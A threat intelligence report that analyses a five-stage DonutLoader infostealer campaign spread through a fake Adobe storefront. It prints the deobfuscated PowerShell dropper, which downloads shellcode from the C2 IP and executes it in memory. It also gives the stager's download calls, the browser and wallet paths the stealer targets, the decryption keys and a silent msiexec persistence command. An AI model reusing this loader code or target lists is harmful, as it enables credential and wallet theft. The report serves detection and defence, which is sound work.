mediumBotnet

Unmasked: A 5-Stage DonutLoader Campaign Hiding Behind a Fake Adobe Storefront

InvestigatedMarch 16, 2026PublishedMarch 16, 2026

botnetphishingcredential-theftc2apt

TL;DR: A fully decrypted 5-stage infection chain -- PowerShell dropper to Donut shellcode to svchost injection to infostealer -- distributes through a fake Adobe Creative Cloud reseller site (adobevault.top). The operator made a fatal OPSEC mistake: both the C2 server and the delivery platform share an identical SSH ECDSA host key, definitively linking the infrastructure to a single operator running on Omegatech bulletproof hosting. We recovered the AES-256 exfiltration key, every Chaskey-16 decryption key, and the complete kill chain.

Why This Matters

Most threat intelligence reports on commodity infostealers stop at the hash and the C2 IP. This investigation goes deeper. We decrypted every layer of a DonutLoader-based campaign end-to-end, extracted the cryptographic keys at each stage, mapped the operator's bulletproof hosting footprint across 18+ subnets, and caught them reusing an SSH host key across two nodes -- a mistake that collapses any plausible deniability between the delivery infrastructure and the command-and-control server.

The operator is running what appears to be a Chinese-nexus Malware-as-a-Service platform on Omegatech LTD infrastructure (AS202412, Seychelles-registered, German-operated), with 145+ Apache hosts across the ASN serving diverse fraud operations alongside this malware campaign.

This is the kind of infrastructure that gets rented, not built from scratch. Understanding its architecture helps defenders recognize not just this campaign, but the next one that reuses the same hosting, the same toolchain, and the same operational patterns.

The Lure: A Convincing Adobe Fraud Operation

The initial access vector is adobevault[.]top -- a polished fake Adobe Creative Cloud reseller platform advertising "Affordable Adobe Plans & Reseller Solutions." The site is no amateur phishing page. It runs nginx 1.18.0 backed by a Node.js/Express application on port 3001, integrates Crisp live chat (ID 5025ffe1-919b-4184-8f3a-3505d78b8c8a), maintains an @adobevault Twitter presence, and obtained a wildcard TLS certificate from Let's Encrypt in February 2026.

The domain was registered on October 8, 2025 through NICENIC INTERNATIONAL GROUP CO., LIMITED -- a Chinese IANA-accredited registrar that appears repeatedly in cybercriminal domain portfolios. The first TLS certificate was issued just two days later on October 10, and by late November the campaign was actively delivering payloads through the /360 path.

The site sits at 178.16.52[.]119 on Omegatech's network. Remember this IP. It becomes important.

Stage 1: The PowerShell Dropper

The chain starts with downloaded.ps1 -- a 1,491-byte PowerShell script submitted to MalwareBazaar on March 16, 2026 at 03:16 UTC. The payloads it downloads were last modified at 01:13 UTC that same day, meaning the operator had staged fresh binaries roughly two hours before the sample was caught.

The script is deobfuscated below with annotations:

# C2 payload URL -- server enforces WindowsPowerShell User-Agent
$u = "http://178.16.52.201/9cca20c6df659f72/m_cpt1267381.bin"

try {
    $d = Invoke-WebRequest -Uri $u -UseBasicParsing -ErrorAction Stop
    $b = $d.Content    # 52,811 byte Donut shellcode

    # Compile inline C# at runtime -- avoids pre-compiled binary artifacts
    $c = @"
using System;
using System.Runtime.InteropServices;
public class W {
    [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(
        IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(
        IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress,
        IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);
    [DllImport("kernel32.dll")] public static extern uint WaitForSingleObject(
        IntPtr hHandle, uint dwMilliseconds);
}
"@
    Add-Type -TypeDefinition $c

    # MEM_COMMIT | MEM_RESERVE with PAGE_EXECUTE_READWRITE
    $addr = [W]::VirtualAlloc([IntPtr]::Zero, $s, 0x3000, 0x40)
    [System.Runtime.InteropServices.Marshal]::Copy($b, 0, $addr, $s)

    $th = [W]::CreateThread([IntPtr]::Zero, 0, $addr, [IntPtr]::Zero, 0, [ref]$tid)
    [W]::WaitForSingleObject($th, 30000) | Out-Null   # 30-second wait
}

Three things stand out:

No AMSI bypass in Stage 1. The script relies on Donut's built-in AMSI/WLDP patch in Stage 2 -- meaning the operator is confident the shellcode will execute before AMSI inspects it, or that the victim's AV is already neutralized.
Inline C# compilation via Add-Type. This drops .pdb and .cs artifacts in %TEMP% -- a forensic fingerprint that persists even if the script itself is deleted.
User-Agent gating on the C2. Send a WindowsPowerShell/5.1.19041.610 UA and you get the payload. Send anything else and you get a 302 redirect to cloudflare.com. This is trivially bypassed but filters out casual scanners and most automated crawlers.

The 16-character hex path /9cca20c6df659f72/ functions as a per-campaign token. The filename pattern m_cpt[7-digit-id].bin suggests a MaaS platform issuing per-victim or per-campaign identifiers.

Stage 2: Donut Shellcode -- Chaskey-16 CTR Decryption

The downloaded m_cpt1267381.bin (52,811 bytes, SHA256: 620b3e0b...) is a Donut-generated x64 position-independent shellcode blob. Its structure:

Offset 0x0000: E8 C0 6B 00 00   CALL +0x6BC0  (trampoline; RIP+4 = &instance[0])
Offset 0x0005: [27,579 bytes]   Encrypted DONUT_INSTANCE
Offset 0x6BC5: [loader code]    x64 PEB-walking bootstrap

The encryption is Chaskey-16 in CTR mode -- a lightweight ARX cipher with an Even-Mansour construction (plaintext XOR key -> 16-round permutation -> result XOR key). The counter increments in big-endian byte order starting from byte 15 with carry propagation.

We recovered both keys from the binary:

Key Component	Value
key.mk (MAC/encryption key)	`227247f00bc963563bc51e3e7cb03b2c`
key.ctr (initial counter/nonce)	`22e1fa6d709b9095e0d731fbd197bbf2`

The PEB-walker at offset 0x9a55 resolves API functions without calling LoadLibrary or GetProcAddress directly -- instead walking the Thread Environment Block to the Process Environment Block to the loader's InMemoryOrderModuleList, then matching DLL and export names via FNV-1A hashing:

mov rax, qword ptr gs:[0x30]    ; TEB
mov r9,  qword ptr [rax + 0x60] ; PEB
mov rax, qword ptr [r9 + 0x18]  ; PEB->Ldr
mov rbx, qword ptr [rax + 0x10] ; Ldr->InMemoryOrderModuleList.Flink

An anti-disassembly trick at 0x6BC6 uses a dead conditional jump (xor eax, eax sets ZF=1 and SF=0, so a subsequent js is never taken) to confuse linear disassemblers.

After decryption, the DONUT_MODULE structure reveals the inner payload:

+0x0000  DLL names: "ole32;oleaut32;wininet;mscoree;shell32"
+0x104C  MZ signature -- payload.exe starts here

Stage 3: The Native Stager -- Privilege Escalation and Process Injection

Extracted from the Donut wrapper, payload.exe (22,840 bytes, SHA256: 064fc244...) is a MinGW-w64 binary cross-compiled with GCC 15.1.0 on Linux. It is not obfuscated -- the operator apparently trusts the Donut encryption and in-memory execution to evade detection.

The stager does three things in sequence:

1. Privilege Escalation -- SeDebugPrivilege

LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &luid);
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);

SeDebugPrivilege allows the process to open handles to any process on the system, including protected system services.

2. Target Acquisition -- svchost.exe Enumeration

CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
Process32FirstW(...);
// Walk until wcscmp(pe32.szExeFile, L"svchost.exe") == 0

The stager finds the first svchost.exe instance and prepares it as the injection target.

3. Process Injection -- Classic CreateRemoteThread

VirtualAllocEx  -> Allocate RWX memory in svchost.exe
WriteProcessMemory -> Copy Stage 4 Donut shellcode into allocation
CreateRemoteThread -> Execute shellcode in svchost.exe context

It then downloads the second Donut payload via WinHTTP:

WinHttpConnect(session, L"178.16.52.201", 80, 0)
WinHttpOpenRequest(conn, L"GET", L"/9cca20c6df659f72/m_cpt_bld172638.bin", ...)

Wide strings extracted from the binary give away the entire operation without any dynamic analysis:

178.16.52.201
/9cca20c6df659f72/m_cpt_bld172638.bin
svchost.exe
nsvchost.exe     <-- process name spoof
powershell

Stage 4: Second Donut Layer

m_cpt_bld172638.bin (254,027 bytes, SHA256: 145dace2...) is another Donut-generated shellcode using the same Chaskey-16 CTR cipher with different keys:

Key Component	Value
key.mk	`e50cc01a0ec280afc5cfde29c4d31e2b`
key.ctr	`8d31a9d17c9b518ccaff90f3a0b2e81a`

The _bld in the filename likely stands for "build" -- this is the production payload as opposed to the lightweight stager. The encrypted instance is 228,800 bytes, containing the full infostealer PE.

Stage 5: The Infostealer -- Full Credential Harvester

The final payload stage3_payload.exe (224,056 bytes, SHA256: 4c5d762a...) is the crown jewel: a comprehensive infostealer compiled with the same MinGW-w64 GCC 15.x Linux cross-compilation toolchain as Stage 3.

Hardcoded AES-256 Key

Sitting in plaintext in the binary:

sysinfo_aes256_channel_key_2024!!

This 32-byte string is the symmetric key used with Windows bcrypt.dll (BCryptEncrypt/BCryptDecrypt) to encrypt all exfiltrated data before transmission. Anyone with a network capture of C2 traffic from an infected host can decrypt the exfiltration stream with this key.

The sysinfo_ prefix is consistent with naming conventions observed in several Chinese infostealer families. The 2024 in the key suggests this tooling (or at least its crypto layer) dates to at least 2024, predating the campaign infrastructure registered in late 2025.

Credential Targets

The stealer targets six Chromium-family browsers:

Browser	Path
Chrome	`%LOCALAPPDATA%\Google\Chrome\User Data\`
Edge	`%LOCALAPPDATA%\Microsoft\Edge\User Data\`
Brave	`%LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\`
Opera	`%APPDATA%\Opera Software\Opera Stable\`
Opera GX	`%APPDATA%\Opera Software\Opera GX Stable\`
Vivaldi	`%LOCALAPPDATA%\Vivaldi\User Data\`

From each, it extracts Login Data (saved passwords), Cookies, Web Data (autofill), and History.

Cryptocurrency Wallet Targeting

The stealer enumerates 100+ Chrome extension IDs for cryptocurrency wallets and password managers, including:

nkbihfbeogaeaoehlefnkodbefgpgknn  MetaMask
bfnaelmomeimhlpmgjnjophhpkkoljpa  Phantom (Solana)
ibnejdfjmmkpcnlpebklmnkoeoihofec  Trezor Suite
fooolghllnmhmmndgjiamiiodkpenpbb  Ledger Live
hdokiejnpimakedhajhdlcegeplioahd  LastPass
aeblfdkhhhdcdjpifhhbdiojplfjncoa  1Password

It also targets local wallet application data:

%APPDATA%\Exodus\
%APPDATA%\Electrum\wallets\
%APPDATA%\Ethereum\keystore\
%APPDATA%\.monero-project\
%APPDATA%\Bitcoin\
%APPDATA%\Atomic\
%APPDATA%\Coinomi\

Additional Capabilities

Screenshot capture via GDI32/gdiplus BitBlt
OpenVPN credential theft from %APPDATA%\OpenVPN Connect\profiles\ and %USERPROFILE%\OpenVPN\auth.txt
Persistence via silent MSI installation: downloads install.msi (2.3 MB) from the C2 and executes msiexec /i install.msi /quiet /norestart
Chrome browser injection via a secondary module chromelevator.bin (1.4 MB) downloaded from the C2 to hook Chrome renderer processes
Process masquerading as nsvchost.exe -- a single prepended n that blends into a process list at a glance

The OPSEC Failure That Ties It All Together

The operator's most damaging mistake is simple: both 178.16.52[.]201 (the C2 payload server) and 178.16.52[.]119 (the adobevault[.]top delivery site) present the same SSH ECDSA host key.

Fingerprint (MD5): 6f:1f:3b:94:fa:7f:a7:77:26:35:1a:b8:d9:78:f6:99

Full ECDSA Public Key:
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGM+2TVtpCgr
bUudFMDpfgPOxAP2OwO75dpegTZOTuB/Jsj0dg3cyBjb7k/waOuwH1TsdEFM95YL
MBT9defY5GE=

HASSH: 41ff3ecd1458b0bf86e1b4891636213e

SSH host keys are generated per-server at installation time. Two machines sharing the same key means one of two things: (1) one was cloned from the other, or (2) the key was manually copied between them. Either way, the same operator controls both systems. This collapses the operational separation between the "legitimate-looking" Adobe storefront and the backend C2 infrastructure into a single, attributable entity.

This was not the only mistake:

OPSEC Failure	Impact
Shared SSH host key across two nodes	Definitively links C2 to delivery infrastructure
All 4 payload URLs live for 12+ hours	Full stage-by-stage chain recovery
User-Agent gating only (no IP filtering)	Trivially bypassed with `curl -A "WindowsPowerShell/5.1..."`
Hardcoded AES-256 key in plaintext	Enables decryption of all exfiltrated C2 traffic
Unobfuscated wide strings in Stage 3 PE	Full IOC extraction without execution
Open directory listing on wc-gateway[.]com	Staging area contents disclosed
C2 IP flagged in MalwareFilter since Dec 2025	3 months of historical tracking pre-submission

Infrastructure: Omegatech's Bulletproof Empire

The entire campaign runs on Omegatech LTD (AS202412), a textbook bulletproof hosting operation: registered in the Seychelles, operationally based in Dusseldorf, Germany, with upstream transit through dus.net GmbH. The ASN was allocated in August 2025 -- just weeks before the adobevault[.]top domain was registered.

Our scan of the ASN revealed approximately 145 Apache/2.4.58 hosts across 18+ /24 subnets. The infrastructure is not limited to this malware campaign. Adjacent IPs host:

178.16.52.0/24  (primary cluster)
  .201  DonutLoader C2 (this campaign)
  .119  adobevault.top delivery (linked via SSH key)
  .182  hosting.proactlve.co.in -- cPanel hosting, CERT.PL flagged
  .142  wc-gateway.com -- Windows host, WinRM + SMB open, open directory
  .150  luckydragon.bet -- crypto gambling
  .84   neomarkets.io -- fake crypto trading platform
  .175  allpay.finance -- financial phishing

178.16.55.0/24  (secondary cluster)
  .133  apparaatopwebplatform.ru -- 403-gated defensive C2
  .194  Active phishing node

91.92.240.0/22  (auxiliary cluster)
  91.92.243.149  helpconnectpc.online / serviceconnecting.com -- ScreenConnect abuse
  91.92.242.75   corner2stone.com -- crypto investment scam
  91.92.240.23   coinpassledger.org -- Ledger phishing

The diversity -- malware C2, fake Adobe storefronts, crypto scams, ScreenConnect abuse, cPanel hosting -- is characteristic of a MaaS platform renting infrastructure to multiple operators or a single sophisticated group running parallel fraud campaigns.

Attribution Assessment

Confidence: MEDIUM -- Chinese-nexus MaaS operator

The evidence points converge on a Chinese-nexus operation, though individual indicators are circumstantial:

Registrar selection: Both adobevault[.]top (NICENIC) and wc-gateway[.]com (CNOBIN) were registered through Chinese IANA-accredited registrars that appear disproportionately in Chinese cybercriminal campaigns
Toolchain: DonutLoader with MinGW-w64 cross-compiled Windows payloads built on Linux -- documented TTPs for multiple Chinese threat groups
Key naming: The sysinfo_ prefix in the AES key matches conventions in known Chinese infostealer families
Infrastructure model: Seychelles-registered BPH with German operations is a structure favored by Chinese MaaS resellers
Scale: 145+ hosts, 18+ subnets, mixed fraud and malware -- suggests a commercial operation, not a lone actor

The campaign path pattern (/[16-hex]/m_cpt[7-digit].bin) and per-victim ID structure further support the MaaS hypothesis: this infrastructure is likely rented to downstream operators who customize their lures while sharing the backend toolchain.

Campaign Timeline

Date	Event
2025-08-18	Omegatech AS202412 allocated; `megatechends[.]com` registered
2025-10-08	`adobevault[.]top` registered via NICENIC (Chinese registrar)
2025-10-10	First TLS certificate issued for `adobevault[.]top`
2025-10-17	`/inquiry` path active on C2 -- early operational testing
2025-11-23	C2 IP appears in malware-filter botnet lists
2025-11-26	`/360` campaign delivery path active on `adobevault[.]top`
2025-12-12	C2 IP added to MalwareFilter Botnet List
2026-02-13	Wildcard cert `*.adobevault[.]top` issued -- infrastructure expansion
2026-02-21	`wc-gateway[.]com` registered -- new infrastructure node
2026-03-16 01:13 UTC	Fresh payloads staged on C2
2026-03-16 03:16 UTC	Sample submitted to MalwareBazaar
2026-03-16	All 4 payload URLs confirmed live during our analysis

The operator has been active for at least 5 months, with the C2 IP flagged in public blocklists for 3 months before a sample was formally submitted. This gap between reputation burn and public sample availability is concerning -- it means the campaign was operating successfully for months while defenses that rely solely on hash-based detection would have missed it entirely.

MITRE ATT&CK Mapping

Tactic	Technique	ID	Application
Execution	PowerShell	T1059.001	`Invoke-WebRequest` + `Add-Type` inline C#
Execution	Reflective Code Loading	T1620	Donut decrypts + loads PE in-memory
Defense Evasion	Obfuscated Files: Embedded Payloads	T1027.009	Chaskey-16 CTR encrypted Donut payloads
Defense Evasion	Masquerading: Legitimate Name	T1036.005	Process named `nsvchost.exe`
Defense Evasion	Subvert Trust Controls	T1553	Inline C# avoids pre-compiled AV detection
Privilege Escalation	Token Manipulation	T1134.001	SeDebugPrivilege via `AdjustTokenPrivileges`
Discovery	Process Discovery	T1057	`CreateToolhelp32Snapshot` for svchost.exe
Lateral Movement	Process Injection: DLL Injection	T1055.001	VirtualAllocEx + WriteProcessMemory into svchost.exe
Collection	Screen Capture	T1113	GDI `BitBlt` screenshot
Credential Access	Credentials from Web Browsers	T1555.003	Chrome/Edge/Brave/Opera/Vivaldi credential theft
Credential Access	Steal Web Session Cookie	T1539	Cookie file theft from Chromium browsers
Credential Access	Credentials in Files	T1552.001	OpenVPN auth.txt, crypto wallet files
Command and Control	Web Protocols	T1071.001	HTTP C2 for payload delivery and exfiltration
Command and Control	Encrypted Channel	T1573.001	AES-256 encrypted exfiltration channel
Persistence	Boot/Logon Autostart	T1547	Silent MSI installer (`msiexec /quiet`)
Resource Development	Acquire Infrastructure: Server	T1583.004	Omegatech LTD bulletproof hosting

Complete IOC Table

File Hashes

Stage	SHA256	MD5	Description
1	`03e4185a6e817ffa0957b0a8091f328232bd0d5dab4246c892c344188997b888`	`f4fa194ae1b76d62d11a357c495d1e2a`	PS1 dropper
2	`620b3e0b1d3e4d8c6aef5c5a4f52d092c94d0f583f37f30b17a5854f7fb6b933`	`d06cb6840b645fa6012e763b1b3b4334`	Donut shellcode (52 KB)
3	`064fc244c2aaf7e602cf53b725f0355df44bc4e13719fb5bd959efa09887586a`	`b6f956caa93732c22c9b5a820f0503c2`	Native stager PE
4	`145dace286f5c5e96d4627073f8c78c63166dd50a52ba23c3e21dc466d8fef7c`	`0129c59c211d038f6bcc5d0130fe4cde`	Donut shellcode (254 KB)
5	`4c5d762a8894e4b85c96526d67f0f9a182eb59f17a12e980199d52763428b1b9`	`420acb17c64315193cdece359abf88e3`	Infostealer PE

Cryptographic Keys

Artifact	Value
Stage 2 Donut key.mk	`227247f00bc963563bc51e3e7cb03b2c`
Stage 2 Donut key.ctr	`22e1fa6d709b9095e0d731fbd197bbf2`
Stage 4 Donut key.mk	`e50cc01a0ec280afc5cfde29c4d31e2b`
Stage 4 Donut key.ctr	`8d31a9d17c9b518ccaff90f3a0b2e81a`
Infostealer AES-256	`sysinfo_aes256_channel_key_2024!!`

Network Indicators

Indicator	Role
`178.16.52[.]201`	Primary C2 / payload server
`178.16.52[.]119`	adobevault[.]top delivery (linked SSH key)
`178.16.52[.]182`	proactlve[.]co[.]in cPanel host
`178.16.52[.]142`	wc-gateway[.]com Windows host
`178.16.55[.]133`	apparaatopwebplatform[.]ru C2 node
`178.16.55[.]194`	Active phishing node
`91.92.243[.]149`	ScreenConnect abuse
`adobevault[.]top`	Fake Adobe reseller (delivery)
`wc-gateway[.]com`	Staging infrastructure
`proactlve[.]co[.]in`	Typosquat cPanel hosting
`apparaatopwebplatform[.]ru`	Defensive C2 node
`helpconnectpc[.]online`	ScreenConnect abuse
`serviceconnecting[.]com`	ScreenConnect abuse

C2 URLs

hxxp://178.16.52[.]201/9cca20c6df659f72/m_cpt1267381.bin       (Stage 2 Donut)
hxxp://178.16.52[.]201/9cca20c6df659f72/m_cpt_bld172638.bin     (Stage 4 Donut)
hxxp://178.16.52[.]201/9cca20c6df659f72/install.msi             (MSI persistence)
hxxp://178.16.52[.]201/9cca20c6df659f72/chromelevator.bin        (Chrome injector)
hxxps://adobevault[.]top/                                        (Initial lure)
hxxps://adobevault[.]top/360                                     (Campaign delivery)

SSH Infrastructure

Field	Value
ECDSA Fingerprint (MD5)	`6f:1f:3b:94:fa:7f:a7:77:26:35:1a:b8:d9:78:f6:99`
HASSH	`41ff3ecd1458b0bf86e1b4891636213e`
Shared by	`178.16.52[.]201` and `178.16.52[.]119`

Host-Based Indicators

Artifact	Description
`downloaded.ps1`	Stage 1 filename
`m_cpt1267381.bin`	Stage 2 filename pattern
`m_cpt_bld172638.bin`	Stage 4 filename pattern
`nsvchost.exe`	Masquerade process name
`sysinfo_aes256_channel_key_2024!!`	Hardcoded AES key in binary
`%TEMP%\.cs`, `%TEMP%\.pdb`	Add-Type compiler artifacts
`install.msi`	Persistence installer
`chromelevator.bin`	Chrome injection module

Detection Guidance

PowerShell Monitoring (Stage 1)

Defenders should alert on the combination of these behaviors in a single PowerShell session:

Invoke-WebRequest downloading .bin files in the same session as Add-Type
VirtualAlloc + CreateThread P/Invoke via DllImport in a single script
Scripts containing both Marshal.Copy and CreateThread -- this pattern is almost exclusively malicious

Memory and Process Monitoring (Stages 2-4)

VirtualAlloc with PAGE_EXECUTE_READWRITE (protection value 0x40) followed by CreateThread to that allocation
SeDebugPrivilege token adjustment outside administrative tooling context (e.g., not from Task Manager, Process Explorer, or a debugger)
CreateRemoteThread targeting svchost.exe where the source process is not a system service
Any process named nsvchost.exe -- this is not a legitimate Windows binary

Network Detection

HTTP GET to a bare IP address (no Host header with a domain) with a WindowsPowerShell User-Agent requesting a binary file -- this pattern has near-zero legitimate use
HTTP requests matching the URI pattern ^/[0-9a-f]{16}/m_cpt.*\.bin$
Any traffic to 178.16.52[.]201 or the AS202412 IP ranges listed above
DNS queries for adobevault[.]top, wc-gateway[.]com, or any of the associated domains

File-Based Detection

File creation of nsvchost.exe anywhere on the filesystem
The string sysinfo_aes256_channel_key_2024!! present in any binary
MSI installation via msiexec /i with a URL-based source pointing to a bare IP address

So What? -- What Defenders Should Do Now

Immediate (next 24-48 hours):

Block all IPs and domains listed in the IOC table at your perimeter firewall and DNS resolver
Search proxy/firewall logs for connections to 178.16.52[.]201 and adobevault[.]top -- any hits indicate active or historical compromise
Hunt for nsvchost.exe across your endpoint fleet
If you find the AES key string in any binary on your network, that host is compromised -- isolate immediately and begin IR

Short-term (next 1-2 weeks):

Deploy the YARA rules and Suricata signatures from this investigation (available in the full GHOST investigation package)
Add the HASSH fingerprint 41ff3ecd1458b0bf86e1b4891636213e to your SSH monitoring if you track outbound SSH connections
Review browser credential stores on any potentially exposed endpoints -- the stealer targets Login Data, Cookies, and autofill across six browsers
Rotate credentials for any users whose endpoints may have been compromised, with priority on cryptocurrency wallets and VPN credentials

Medium-term (next 1-3 months):

Consider blocking AS202412 (Omegatech LTD) at the network level. The ratio of malicious to legitimate traffic on this ASN is extremely unfavorable
Implement PowerShell Constrained Language Mode on endpoints where full PowerShell is not operationally required
Deploy behavioral rules for VirtualAlloc(RWX) + CreateThread patterns -- this catches not just this campaign but the entire class of shellcode stagers that rely on this technique
Monitor Certificate Transparency logs for new certificates on adobevault[.]top and *.adobevault[.]top -- a wildcard cert was issued in February 2026, indicating the operator is expanding the infrastructure

The operator has been active since at least October 2025 and shows no signs of slowing down. The infrastructure is expanding, the tooling is functional if not sophisticated, and the target list -- browser credentials, cryptocurrency wallets, VPN credentials, and screenshots -- covers the highest-value data categories for financial cybercrime. The only thing working in defenders' favor is that this operator makes mistakes. The question is whether you find the evidence before or after they find your users' credentials.

This investigation was conducted by GHOST, the automated threat intelligence engine at Breakglass Intelligence. The full investigation package -- including STIX 2.1 bundle, YARA rules, and Suricata signatures -- is available at intel.breakglass.tech.